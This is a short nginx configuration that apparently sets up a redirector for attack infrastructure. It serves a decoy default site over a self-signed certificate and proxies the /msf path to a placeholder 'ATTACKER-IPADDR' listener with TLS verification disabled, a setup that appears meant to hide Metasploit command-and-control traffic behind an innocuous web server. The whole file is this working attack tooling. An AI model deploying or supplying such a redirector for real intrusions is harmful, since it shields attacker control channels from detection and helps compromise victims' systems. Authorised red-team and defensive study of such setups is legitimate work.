server {
  listen IP-ADDR http2 ssl default_server;
  listen [::]:443 ssl default_server;
  root /usr/share/nginx/html;
  index "index.html";

  ssl_certificate "/etc/ssl/certs/nginx-selfsigned.crt";
  ssl_certificate_key "/etc/ssl/private/nginx-selfsigned.key";

  location / {
    try_files $uri $uri/ =404;
  }

  location /msf {
    proxy_pass "https://ATTACKER-IPADDR:port";
    proxy_ssl_verify off;
    proxy_set_header Host $host;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
  }
}
